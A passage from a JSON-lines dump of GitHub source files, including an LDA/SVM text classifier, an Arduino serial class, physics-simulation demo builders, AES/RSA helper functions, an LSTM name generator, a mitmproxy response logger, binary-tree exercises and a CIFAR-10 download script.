vectorizer.fit_transform(corpus)\r\n #np.sum(doc_term_mat)\r\n #doc_term_mat[99,1787]\r\n Vocabulary = vectorizer.get_feature_names()\r\n \r\n WS, DS = lda.utils.matrix_to_lists(doc_term_mat)\r\n \r\n my_lda_start = time.time()\r\n model = LDA_Model(num_topics = number_of_topics, num_terms = len(Vocabulary)) \r\n\r\n docs = []\r\n for d in range(num_train_docs):\r\n docs.append(Document(doc_id = train_idlist[d], K = model.num_topics, words_id = WS[DS==d], \r\n label = reuters.categories(train_idlist[d])))\r\n \r\n EM(docs,model,EM_MAX_ITER = 1000)\r\n \r\n my_lda_end = time.time()\r\n my_lda_time = my_lda_end-my_lda_start\r\n print(\"My LDA runtime: {}\".format(my_lda_time))\r\n\r\n text_file.close()\r\n \r\n # calculate the top 10 terms of each topic\r\n \r\n topicwords = []\r\n maxTopicWordsNum = 10\r\n for z in range(0, model.num_topics):\r\n ids = model.log_prob_w[z, :].argsort()\r\n topicword = []\r\n for j in ids:\r\n topicword.insert(0, Vocabulary[j])\r\n topicwords.append(topicword[0 : min(maxTopicWordsNum, len(topicword))])\r\n\r\n\r\n\r\n\r\n np.set_printoptions(threshold=10000)\r\n X = []\r\n Y = []\r\n for i in range(num_train_docs):\r\n #print('gamma: {} \\n label: {}'.format(docs[i].gamma, docs[i].label))\r\n X.append(docs[i].gamma)\r\n Y.append(docs[i].label)\r\n \r\n three_classes = []\r\n for label in Y:\r\n if 'earn' in label:\r\n three_classes.append('0')\r\n elif 'acq' in label:\r\n three_classes.append('1')\r\n else:\r\n three_classes.append('2')\r\n \r\n \r\n test_labels, test_corpus = read_document(test_idlist, V=Vocabulary)\r\n test_docs, test_mat = infer(test_labels, test_corpus)\r\n \r\n test_X = []\r\n test_Y = []\r\n for i in range(number_of_docs-num_train_docs):\r\n #print('gamma: {} \\n label: {}'.format(docs[i].gamma, docs[i].label))\r\n test_X.append(test_docs[i].gamma)\r\n test_Y.append(test_docs[i].label)\r\n\r\n\r\n mul_binarizer = MultiLabelBinarizer()\r\n bin_Y = mul_binarizer.fit_transform(three_classes)\r\n \r\n# le = LabelEncoder()\r\n# vec_Y = le.fit_transform(three_classes)\r\n new_X = np.vstack(X)\r\n\r\n SVM_classifier = OneVsRestClassifier(svm.SVC())\r\n SVM_classifier.fit(new_X,bin_Y)\r\n pred = SVM_classifier.predict(test_X)\r\n pred = np.array(pred) \r\n pred_label = np.argmax(pred,axis=1)\r\n \r\n test_classes=[]\r\n for label in test_Y:\r\n if 'earn' in label:\r\n test_classes.append(0)\r\n elif 'acq' in label:\r\n test_classes.append(1)\r\n else:\r\n test_classes.append(2)\r\n \r\n test_classes = np.array(test_classes)\r\n np.sum(test_classes[pred_label==0]==2)\r\n\r\n# table = np.argmax(X, axis=1)\r\n# Y[:20]\r\n# plt.plot(list(range(38)),test_X[3])\r\n# plt.xlabel('Topic index')\r\n# pred = np.argmax(test_X, axis=1)\r\n# \r\n# for p in table[:20]:\r\n# #print(Y[np.where(table==p)[0][0]])\r\n# print(topicwords[p])\r\n \r\n# np.save('model_alpha', model.alpha)\r\n# np.save('model_log_prob_w', model.log_prob_w)\r\n# np.save('model_num_topics', model.num_topics)\r\n# np.save('model_num_terms', model.num_terms)\r\n# \r\n# np.save('train_gammas',X)\r\n# np.save('train_labels',Y)\r\n# np.save('test_gammas',test_X)\r\n# np.save('test_labels',test_Y)\r\n\r\n \r\n# '''\r\n# LDA Package\r\n# '''\r\n# \r\n# pkg_lda_start = time.time()\r\n# model_p = lda.LDA(n_topics=number_of_topics)\r\n# model_p.fit(doc_term_mat)\r\n# \r\n# pkg_lda_end = time.time()\r\n# pkg_lda_time = pkg_lda_end - pkg_lda_start\r\n# \r\n# \r\n# print(\"Package LDA runtime: {}\".format(pkg_lda_time))\r\n# print(\"My LDA runtime: {}\".format(my_lda_time))\r\n#\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"ShibaiZhang/LDA","sub_path":"reuters_main.py","file_name":"reuters_main.py","file_ext":"py","file_size_in_byte":12526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9366604829","text":"\"\"\"\nSerial communication class\n\"\"\"\n\nimport serial\nimport time\nimport config\n\n\nclass Arduino(object):\n def __init__(self):\n try:\n self.arduino = serial.Serial(config.SERIAL_PORT, 115200, timeout=.1)\n except serial.serialutil.SerialException:\n raise RuntimeError('Impossible to connect to Arduino')\n\n time.sleep(1)\n\n def write(self, msg):\n # \"#\" is termination char\n msg = str(msg) + '#'\n self.arduino.write(msg)","repo_name":"fferrara/pysmartenv","sub_path":"pysmartenv/arduino.py","file_name":"arduino.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1564128114","text":"from MiroClasses.MiroAPI_selector import SelectedAPI as MiroAPI\nfrom MiroClasses.MiroModule import Module as MiroModule\nfrom MiroClasses.MiroComponent import MiroComponent\nimport numpy as np\n\nfrom src import Components\nfrom src import Boosters\nfrom src import Sensors\n\ntry:\n import CustomComponents_local as CustomComponents\nexcept:\n import CustomComponents\n\n### LANDER BOX\n# To learn how to modify the Lander, start by changing the components for the\n# Bottom and Top plates on lines 31 and 32 to change the Lander dimension.\n# Then change the rods on lines 36-39 to another component model to see how \n# the lander changes. \ndef DemoLander(args):\n aim = args[0]\n tilt = -args[1]\n Lander = MiroModule('Landing Box')\n\n # Add top and bottom plates\n # MC component arguments are rotation, position and fixed (true/false)\n # Defaults to [0,0,0], [0,0,0], False if arguments are not provided\n # Note: Use Lander.RotateX, Y or Z if you are making several rotations to\n # a component, as the order the rotations are made in is significant. \n Lander.AddComponent(Components.MC035([ 0, 90, 0], [0,0,0], False), 'Bottom plate')\n Lander.AddComponent(Components.MC035([180, 90, 0]), 'Top plate')\n\n # Add vertical rods\n Lander.AddComponent(Components.MC113([ 0, 0, 90]), 'Rod A')\n Lander.AddComponent(Components.MC113([ 0, 0, 90]), 'Rod B')\n Lander.AddComponent(Components.MC113([ 0, 0, 90]), 'Rod C')\n Lander.AddComponent(Components.MC113([ 0, 0, 90]), 'Rod D')\n \n # Add a sensor to the module.\n # We need to flip it upside down as with the Top Plate.\n # This can be done after adding it to the module by .RotateX()\n Lander.AddSensor(Sensors.MSA02([ 0, 0, 0]), 'Accelerometer')\n Lander.RotateX('Accelerometer', 180)\n\n Lander.RotateComponentsZ(tilt)\n Lander.RotateComponentsY(aim)\n\n # Connect Rods to bottom plate\n # It connects the first component to the second by\n # moving the second component so the points match\n Lander.ConnectComponents('Bottom plate', 'A', 'Rod A', 'A')\n Lander.ConnectComponents('Bottom plate', 'B', 'Rod B', 'A')\n Lander.ConnectComponents('Bottom plate', 'C', 'Rod C', 'A')\n Lander.ConnectComponents('Bottom plate', 'D', 'Rod D', 'A')\n\n # Connect Top plate to rods (note the order compared to above)\n Lander.ConnectComponents('Rod A', 'B', 'Top plate', 'C')\n Lander.ConnectComponents('Rod B', 'B', 'Top plate', 'D')\n Lander.ConnectComponents('Rod C', 'B', 'Top plate', 'A')\n Lander.ConnectComponents('Rod D', 'B', 'Top plate', 'B')\n\n # Connect sensor to the module, behaves just like a component\n Lander.ConnectComponents('Top plate', 'E', 'Accelerometer', 'Linkpoint')\n\n return Lander\n\n\n### CATAPULT LAUNCHER\n# To learn how to modify the Launcher, start by changing the component 'Main arm' on line 26\n# to one of different length and calibrate the spring constant on line 77. \n# The Launcher can hit the target with modifications to only these two things.\ndef DemoLauncher(args):\n # Extract arguments into local variables\n aim = args[0]\n angle = args[1]\n\n # Start by creating a new module\n Launcher = MiroModule('Catapult')\n\n # Add some components\n Launcher.AddComponent(Components.MC907([0,0,0]), 'Base')\n Launcher.AddComponent(Components.MC906([0,0,0]), 'Pillar')\n Launcher.AddComponent(Components.MC144([0,0,-angle]), 'Main arm')\n Launcher.AddComponent(Components.MC095([0,90,-angle]), 'Launch plate')\n\n Launcher.AddComponent(Components.MC115([0,90,180-angle]), 'Stop holder')\n Launcher.AddComponent(Components.MC221([90,0,0]), 'Rotation pole out') # Appearance only\n Launcher.AddComponent(Components.MC221([90,0,0]), 'Rotation pole in') # Appearance only\n\n Launcher.AddComponent(CustomComponents.KristerK([-90,-150,0]), 'Custom K') # Custom Component\n\n # Example of how to set the reference point for where to put the lander\n # This puts the reference point 8cm above the Launch plate\n Launcher.SetReferenceComponent('Launch plate', [0, 0.08, 0])\n\n # Reference point rotates when ALL components rotate\n Launcher.RotateComponentsY(aim)\n\n # Connect the components. The first remains in position, and the second component is moved to match\n Launcher.ConnectComponents('Base', 'E', 'Pillar', 'C')\n Launcher.ConnectComponents('Pillar', 'A', 'Main arm', 'C', 0.025) # Here, the 0.025 is to leave space between\n Launcher.ConnectComponents('Main arm', 'H', 'Launch plate', 'E')\n Launcher.ConnectComponents('Launch plate', 'A', 'Stop holder', 'H')\n Launcher.ConnectComponents('Launch plate', 'B', 'Stop holder', 'G')\n Launcher.ConnectComponents('Main arm', 'D', 'Rotation pole out', 'B')\n Launcher.ConnectComponents('Main arm', 'C', 'Rotation pole in', 'A')\n Launcher.ConnectComponents('Pillar', 'F', 'Custom K', 'C')\n\n # To find the global coordinate of a link point, you can print it like this\n # print(Launcher.GetLinkPointXYZ('Main arm', 'B'))\n\n # To visualize where a link point is, you can use this function, or the DUMMY component. \n # Make sure to do this after connecting all the components.\n Launcher.MarkLinkpoint('Base', 'B', color='blue')\n\n # Set a spring to make the catapult launch. You can use any values, but they must be fixed \n # (i.e. not computed from input arguments)\n # State which two connection points you want to connect the spring to, then choose a rest length and spring constant.\n # Rest length: How long the spring is when it exerts no force. If it is made shorter then this length, \n # it is compressed and will push out to expand. If it is made longer, it is streched and will pull to contract.\n # Spring constant: How powerful the spring is. Higher value means more force.\n # The spring is not visible, but the connection points are visualized by small spheres. You can change the default appearance or remove these with input arguments.\n Launcher.SetSpring('Base', 'A', 'Main arm', 'E', 1.1, 17000)\n\n # Fixate the moving parts so that they initially do not move. This is released after the initial delay.\n Launcher.Fixate('Main arm')\n\n return Launcher\n\n\n### Little robot\ndef DemoRobot1():\n MyRobot = MiroModule('MyRobot')\n\n # Add body components\n MyRobot.AddComponent(Components.MC035(), 'Base')\n MyRobot.AddComponent(Components.MC093(), 'Top')\n MyRobot.RotateX('Top', 180)\n \n # Connect the components. The first remains in position, and the second component is moved to match\n MyRobot.ConnectComponents('Base', 'A', 'Top', 'A')\n MyRobot.ConnectComponents('Base', 'C', 'Top', 'B')\n\n # Add left wheel components\n MyRobot.AddComponent(Components.MC242(), 'Wheel: Left, Back')\n MyRobot.AddComponent(Components.MC242(), 'Wheel: Left, Front')\n MyRobot.RotateX(['Wheel: Left, Front', 'Wheel: Left, Back'], 90)\n \n # Attach the left wheels\n MyRobot.ConnectComponents('Base', 'G', 'Wheel: Left, Back', 'A')\n MyRobot.ConnectComponents('Base', 'F', 'Wheel: Left, Front', 'A')\n\n # # Add right wheel components\n MyRobot.AddComponent(Components.MC242(), 'Wheel: Right, Back')\n MyRobot.AddComponent(Components.MC242(), 'Wheel: Right, Front')\n MyRobot.RotateX(['Wheel: Right, Front', 'Wheel: Right, Back'], -90)\n\n # Attach the right wheels\n MyRobot.ConnectComponents('Base', 'I', 'Wheel: Right, Back', 'A')\n MyRobot.ConnectComponents('Base', 'H', 'Wheel: Right, Front', 'A')\n \n # Set custom textures\n # MyRobot.SetTexture(['Base', 'Top'], 'mirobooster.png', [1,1])\n # MyRobot.SetTexture(['Wheel: Left, Back', 'Wheel: Left, Back', 'Wheel: Left, Back', 'Wheel: Left, Back'], 'woodwheel.png', [1,1])\n\n # Save the robot layout to enable generating a map using NodeMap\n MyRobot.CreateModuleMap()\n\n return MyRobot","repo_name":"Teskedsgubben/MiroSimulint","sub_path":"DemoModules.py","file_name":"DemoModules.py","file_ext":"py","file_size_in_byte":7788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20471347155","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport policies.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('policies', '0007_auto_20170125_2159'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='policy',\n name='pdf',\n field=models.FileField(blank=True, null=True, upload_to=policies.models.file_name),\n ),\n ]\n","repo_name":"vishnutej9492/simplelifeclone","sub_path":"policies/migrations/0008_auto_20170125_2208.py","file_name":"0008_auto_20170125_2208.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73370399751","text":"import hashlib\nimport secrets\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes, serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nimport io\n\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n\n\ndef stop_server(err):\n \"\"\" Print err and stop script execution \"\"\"\n print(f\"Fatal Error due to: {err}\")\n exit(1)\n\n\ndef parse_port(file_path):\n \"\"\" Parse port.info for port number. On any failure, None will be returned. \"\"\"\n port = None\n try:\n with open(file_path, \"r\") as info:\n port = info.readline().strip()\n port = int(port)\n except (ValueError, FileNotFoundError):\n port = None\n return port\n\n\ndef generate_aes_key():\n \"\"\" Generating AES key. \"\"\"\n key = secrets.token_bytes(16)\n return key\n\n\ndef encrypt_aes_key(aes_key, public_key_str):\n # Load the public key from a string\n public_key = serialization.load_pem_public_key(\n public_key_str.encode(),\n backend=default_backend()\n )\n\n # Encrypt the AES key with the public key\n encrypted_aes_key = public_key.encrypt(\n aes_key,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n\n return encrypted_aes_key\n\n\ndef decrypt_file_content(encrypted_content, aes_key):\n cipher = Cipher(algorithms.AES(aes_key), modes.CFB(b'\\0' * 16), backend=default_backend())\n decryptor = cipher.decryptor()\n decrypted_content = decryptor.update(encrypted_content) + decryptor.finalize()\n return decrypted_content\n\n\ndef save_to_ram(file_content, file_name):\n in_memory_file = io.BytesIO(file_content)\n file_path = f'/tmp/{file_name}'\n with open(file_path, 'wb') as f:\n f.write(in_memory_file.read())\n return file_path\n","repo_name":"Zsofi91/home_assignment","sub_path":"server_new/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"634434531","text":"# Import necessary modules\nimport json\nimport os\n\n# Define a function to collect user feedback\ndef collect_feedback():\n # Check if feedback file exists\n if os.path.isfile(\"feedback.json\"):\n # If it exists, load feedback data\n with open(\"feedback.json\", \"r\") as feedback_file:\n feedback_data = json.load(feedback_file)\n else:\n # If it doesn't exist, create empty feedback data\n feedback_data = {\"feedback\": []}\n\n # Ask user for feedback\n feedback = input(\"Please enter your feedback: \")\n\n # Add feedback to feedback data\n feedback_data[\"feedback\"].append(feedback)\n\n # Save feedback data to file\n with open(\"feedback.json\", \"w\") as feedback_file:\n json.dump(feedback_data, feedback_file)\n\n # Offer incentive for providing feedback\n print(\"Thank you for your feedback! As a token of our appreciation, please enjoy this exclusive content.\")\n\n# Call the function to collect feedback\ncollect_feedback()\n","repo_name":"willalmighty03/test","sub_path":"user feedback system.py","file_name":"user feedback system.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1416325885","text":"import numpy as np\nfrom keras.models import load_model, Model, Sequential\nfrom keras.layers import LSTM, Dense\nfrom keras.utils import to_categorical\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.sequence import pad_sequences\nimport pickle\n\nDino = open('/home/kaleeswaran/Desktop/Lstm/Dinosaur.txt','r').read()\nDino = Dino.lower()\n\nchars = sorted(list(set(Dino)))\nmapping = {c:i for i,c in enumerate(chars)}\n\ndef subset(length):\n length = length\n sequences = []\n\n for i in range(length, len(Dino)):\n seq = Dino[i-length:i+1]\n sequences.append(seq)\n return(sequences)\n\n# length of the characters you want the model to learn from\nsequences = subset(4)\n\nenc = []\nfor x in sequences:\n tem = [mapping[char] for char in x]\n enc.append(tem)\n\nenc = np.array(enc)\nX = enc[:,:-1]\ny = enc[:,-1]\n\nunique = len(mapping)\nX = [to_categorical(x, num_classes = unique) for x in X]\nX = np.array(X)\ny = [to_categorical(yo, num_classes = unique) for yo in y]\ny = np.array(y)\n\nmodel = Sequential()\nmodel.add(LSTM(128, input_shape=(X.shape[1], X.shape[2])))\nmodel.add(Dense(unique, activation='softmax'))\n\nopt = Adam(lr=0.01, beta_1=0.9, beta_2=0.999, decay=0.01)\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\nmodel.fit(X, y, epochs=100)\n\n# third arguement is the sequence length you initialised earlier and seed_text is the text from where you\n# want the model to make prediction of the dinosaur name\ndef gen_seq(model, mapping, seq_length, seed_text):\n\tin_text = seed_text\n\twhile in_text[-1] != '\\n':\n\t\tencoded = [mapping[char] for char in in_text]\n\t\tencoded = pad_sequences([encoded], maxlen = seq_length, truncating = 'pre')\n\t\tencoded = to_categorical(encoded, num_classes = len(mapping))\n\t\tyhat = model.predict_classes(encoded, verbose = 0)\n\t\tout_char = ''\n\t\tfor char, index in mapping.items():\n\t\t\tif index == yhat:\n\t\t\t\tbreak\n\t\tin_text += char\n\t\tprint(in_text)\n\treturn in_text\n\n\nprint(gen_seq(model, mapping, 4, 'gat'))","repo_name":"kaleeswaranm/Text-Generation-LSTM-Keras","sub_path":"Dinosaur.py","file_name":"Dinosaur.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"27358653606","text":"import bisect\n\nclass MyCalendar:\n\n def __init__(self):\n self.starts = []\n self.ends = []\n \n def book(self, start: int, end: int) -> bool:\n start_index = bisect.bisect_left(self.starts, end)\n end_index = bisect.bisect_right(self.ends, start)\n \n if start_index == end_index:\n self.starts.insert(start_index, start)\n self.ends.insert(end_index, end)\n return True\n return False\n\n# Your MyCalendar object will be instantiated and called as such:\n# obj = MyCalendar()\n# param_1 = obj.book(start,end)","repo_name":"madhvi-n/leetcode-python","sub_path":"729-my-calendar-i/729-my-calendar-i.py","file_name":"729-my-calendar-i.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36494816454","text":"from mitmproxy import http\nimport re\n\n\ndef response(flow: http.HTTPFlow) -> None:\n if flow.request.pretty_url == \"http://127.0.0.1:8080\": # the url of the AI model server\n # this is a response from the AI model server\n data = flow.response.text # get the response data\n # check if the response contains Python code and store it if it does\n codeBlockRegex = r'```python\\n([\\s\\S]*?)```'\n matches = re.findall(codeBlockRegex, data)\n if matches:\n for match in matches:\n print(f\"Found Python code in response: {match}\") # replace this with your actual code storage function\n","repo_name":"itsPreto/baby-code","sub_path":"scripts/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"27"} +{"seq_id":"41038541184","text":"# Python program to insert element in binary tree\nfrom idlelib.tree import TreeNode\nfrom typing import Optional, List\n\nclass newNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n'''\n Link: https://leetcode.com/problems/sum-of-left-leaves/\n Purpose: Find a sum of left leaves\n parameter: Optional[TreeNode] root - a root of a binary tree\n return: int sum - a sum of left leaves\n Pre-Condition: The number of nodes in the tree is in the range [1, 1000].\n : -1000 <= Node.val <= 1000\n Post-Condition: none\n'''\n# use nonlocal: runtime: O(n), memory: O(depth of tree)\ndef sumOfLeftLeaves_M1(root: Optional[TreeNode]) -> int:\n sum = 0\n\n def dfs(root: Optional[TreeNode]):\n nonlocal sum\n if root.left:\n # increment sum by a childNode.value if childNode is a left leaf node\n if not root.left.left and not root.left.right:\n sum = sum + root.left.data\n\n dfs(root.left)\n\n if root.right:\n dfs(root.right)\n\n dfs(root)\n\n return sum\n\n'''\n Link: https://leetcode.com/problems/sum-of-left-leaves/\n Purpose: Find a sum of left leaves\n parameter: Optional[TreeNode] root - a root of a binary tree\n return: int sum - a sum of left leaves\n Pre-Condition: The number of nodes in the tree is in the range [1, 1000].\n : -1000 <= Node.val <= 1000\n Post-Condition: none\n'''\n# increment sum: runtime: O(n), memory: O(depth of tree)\ndef sumOfLeftLeaves_M2(root: Optional[TreeNode]) -> int:\n def dfs(root: Optional[TreeNode]) -> int:\n sum = 0\n if root.left:\n if not root.left.left and not root.left.right:\n sum = sum + dfs(root.left) + root.left.data\n else:\n sum = sum + dfs(root.left)\n\n if root.right:\n sum = sum + dfs(root.right)\n\n return sum\n\n return dfs(root)\n\n# Credit: https://www.geeksforgeeks.org/level-order-tree-traversal/\ndef height(node):\n if node is None:\n return 0\n else:\n # Compute the height of each subtree\n lheight = height(node.left)\n rheight = height(node.right)\n\n # Use the larger one\n if lheight > rheight:\n return lheight + 1\n else:\n return rheight + 1\n\n# Credit: https://www.geeksforgeeks.org/insertion-in-a-binary-tree-in-level-order/\n\"\"\"function to insert element in binary tree \"\"\"\ndef insert(temp, key):\n if not temp:\n root = newNode(key)\n return\n q = []\n q.append(temp)\n\n # Do level order traversal until we find\n # an empty place.\n while (len(q)):\n temp = q[0]\n q.pop(0)\n\n if (not temp.left):\n temp.left = newNode(key)\n break\n else:\n q.append(temp.left)\n\n if (not temp.right):\n temp.right = newNode(key)\n break\n else:\n q.append(temp.right)\n\n\nif __name__ == \"__main__\":\n root1 = newNode(3)\n root1.left = newNode(9)\n root1.right = newNode(20)\n root1.right.left = newNode(15)\n root1.right.right = newNode(7)\n\n print(\"M1:\", sumOfLeftLeaves_M1(root1)) # 24\n print(\"M2:\",sumOfLeftLeaves_M2(root1)) # 24\n print(\"+=====+\")\n\n # now 9 is not a leap\n root1.left.right = newNode(3)\n\n print(\"M1:\", sumOfLeftLeaves_M1(root1)) # 15\n print(\"M2:\",sumOfLeftLeaves_M2(root1)) # 15\n print(\"+=====+\")\n\n root1.left.left = newNode(10)\n\n print(\"M1:\",sumOfLeftLeaves_M1(root1)) # 25\n print(\"M2:\",sumOfLeftLeaves_M2(root1)) # 25\n print(\"+=====+\")\n\n root1.right.right.left = newNode(5)\n\n print(\"M1:\",sumOfLeftLeaves_M1(root1)) # 30\n print(\"M2:\",sumOfLeftLeaves_M2(root1)) # 30\n print(\"+=====+\")\n\n","repo_name":"Poomon001/Competitive-Programming","sub_path":"club python/_ALL DATA STRUCTURE AID TOOLS/recursive with return/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32423522794","text":"#!/usr/bin/env python3\nimport copy\nimport os\nfrom subprocess import call\nimport numpy as np\nimport sklearn.cross_validation\nimport pickle\nimport cv2\nimport shutil\n\ndef unpickle(file):\n fo = open(file, 'rb')\n dict = pickle.load(fo, encoding='latin-1')\n fo.close()\n return dict\n\ndef shuffle_data(data, labels):\n data, _, labels, _ = sklearn.cross_validation.train_test_split(data, labels, test_size=0.0, random_state=42)\n return data, labels\n\ndef load_data(train_batches):\n data = []\n labels = []\n for data_batch_i in train_batches:\n d = unpickle(\n os.path.join(cifar_python_directory, data_batch_i)\n )\n data.append(d['data'])\n labels.append(np.array(d['labels']))\n # Merge training batches on their first dimension\n data = np.concatenate(data)\n labels = np.concatenate(labels)\n length = len(labels)\n\n data, labels = shuffle_data(data, labels)\n\n return data.reshape(length, 3, 32, 32), labels\n\ndef load_label_names():\n d = unpickle (\n os.path.join(cifar_python_directory, \"batches.meta\")\n )\n return d\n\nif __name__ == \"__main__\":\n\n cifar_python_archive = os.path.abspath(\"cifar-10-python.tar.gz\")\n\n if not os.path.exists(cifar_python_archive):\n print(\"Downloading CIFAR10...\")\n call(\n \"wget http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz\",\n shell=True\n )\n print(\"Downloading done.\\n\")\n\n cifar_python_directory = os.path.abspath(\"cifar-10-batches-py\")\n\n print(\"Extracting...\")\n\n call(\n \"tar -zxvf cifar-10-python.tar.gz\",\n shell=True\n )\n\n print(\"Extracting successfully done to {}\".format(cifar_python_directory))\n\n print(\"Converting...\")\n\n cifar_caffe_directory = os.path.abspath('./data')\n\n X, y = load_data(\n [\"data_batch_{}\".format(i) for i in range(1, 6)]\n )\n\n Xt, yt = load_data([\"test_batch\"])\n\n L = load_label_names()\n\n if not os.path.exists(cifar_caffe_directory):\n os.makedirs(cifar_caffe_directory)\n\n train_index = 0\n train_listing = \"\"\n for (img, label) in zip([x for x in X], [l for l in y]):\n fname = \"train-{}.png\".format(train_index)\n r = img[0].astype(np.uint8)\n g = img[1].astype(np.uint8)\n b = img[2].astype(np.uint8)\n output = cv2.merge((b, g, r))\n cv2.imwrite(os.path.join(cifar_caffe_directory, fname), output)\n train_listing += cifar_caffe_directory + \"/\" + fname + \" \" + str(label) + \"\\n\"\n train_index += 1\n\n with open(os.path.join(cifar_caffe_directory, \"train-index.txt\"), \"w\") as text_file:\n text_file.write(train_listing)\n\n test_index = 0\n test_listing = \"\"\n for (img, label) in zip([x for x in Xt], [l for l in yt]):\n fname = \"test-{}.png\".format(test_index)\n r = img[0].astype(np.uint8)\n g = img[1].astype(np.uint8)\n b = img[2].astype(np.uint8)\n output = cv2.merge((b, g, r))\n cv2.imwrite(os.path.join(cifar_caffe_directory, fname), output)\n test_listing += cifar_caffe_directory + \"/\" + fname + \" \" + str(label) + \"\\n\"\n test_index += 1\n\n with open(os.path.join(cifar_caffe_directory, \"test-index.txt\"), \"w\") as text_file:\n text_file.write(test_listing)\n\n with open(os.path.join(cifar_caffe_directory, \"labels.txt\"), \"w\") as text_file:\n text_file.write(\"\\n\".join(L['label_names']))\n\n print(\"Cleaning up...\")\n\n shutil.rmtree(cifar_python_directory)\n\n print(\"Done\")\n","repo_name":"kaveena/myopic-oracle","sub_path":"caffe-cifar-10-training/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30686137869","text":"from autoloader.rules.base import Rule\nfrom repository import Repository\n\nclass RepositoryRule(Rule):\n\n \"\"\"Class defining the autoloader rule to import repositories.\n\n The repositories are module containing a class. This class will be\n returned after importing the module. The repository should be\n saved in the bundle and will be used afterwards.\n\n \"\"\"\n\n def __init__(self, server):\n self.server = server\n\n @staticmethod\n def get_model_name(rep_class):\n \"\"\"Return the model's name defined in the class.\n\n If the 'model_name' class attribute is set, return it.\n Otherwise, return the class name.\n\n \"\"\"\n if hasattr(rep_class, \"model_name\"):\n return rep_class.model_name\n\n full_name = rep_class.__name__\n name = full_name.split(\".\")[-1]\n if name.endswith(\"Repository\"):\n name = name[:-10]\n\n return name\n\n def load(self, module):\n \"\"\"Load a specific module.\n\n This method:\n Get the Repository class defined in the module\n Write this class in the bundle's repositories\n Return the class\n\n \"\"\"\n name = Rule.module_name(module)\n bundle_name = Rule.bundle_name(module)\n bundle = self.server.bundles[bundle_name]\n rep_class = Rule.find_class(module, Repository)\n\n # Write the class in the bundles\n model_name = self.get_model_name(rep_class)\n bundle.repositories[model_name] = rep_class\n return rep_class\n","repo_name":"v-legoff/pa-poc3","sub_path":"src/autoloader/rules/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14253398625","text":"import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nfrom data.config import CREDENTIALS_FILE, spreadsheet_id\n\nscopes = [\"https://spreadsheets.google.com/feeds\", \"https://www.googleapis.com/auth/drive\"]\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(CREDENTIALS_FILE, scopes)\nclient = gspread.authorize(credentials)\n\nlocal = {}\n\n\nasync def get_local_data(sheet_name: str = spreadsheet_id):\n global local\n sheet = client.open_by_key(sheet_name).get_worksheet(0)\n langs = sheet.get_all_values()[0]\n data = sheet.get_all_values()[1:]\n for x in range(len(data)):\n valiable_name = data[x][0]\n append_data = {}\n for y in range(1, len(data[x])):\n append_data[langs[y]] = data[x][y]\n local[valiable_name] = append_data","repo_name":"gooodinho/J4U","sub_path":"data/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25402560928","text":"import os\nimport datasets\nimport numpy as np\n\nfrom fewshot_gym_dataset import FewshotGymDataset, FewshotGymTextToTextDataset\nfrom utils import clean\n\nclass CommonsenseQA(FewshotGymTextToTextDataset):\n\n def __init__(self):\n self.hf_identifier = \"commonsense_qa\"\n self.task_type = \"text to text\"\n self.license = \"unknown\"\n\n def get_choices_and_answer_string(self, datapoint):\n answer_index = datapoint[\"answerKey\"]\n choices_string = \"\"\n for i in range(len(datapoint[\"choices\"][\"label\"])):\n if datapoint[\"choices\"][\"label\"][i] == answer_index:\n answer_string = datapoint[\"choices\"][\"text\"][i]\n choices_string += \" (\" + datapoint[\"choices\"][\"label\"][i] + \") \" + datapoint[\"choices\"][\"text\"][i]\n return choices_string, answer_string\n\n def map_hf_dataset_to_list(self, hf_dataset, split_name):\n lines = []\n for datapoint in hf_dataset[split_name]:\n choices_string, answer_string = self.get_choices_and_answer_string(datapoint)\n 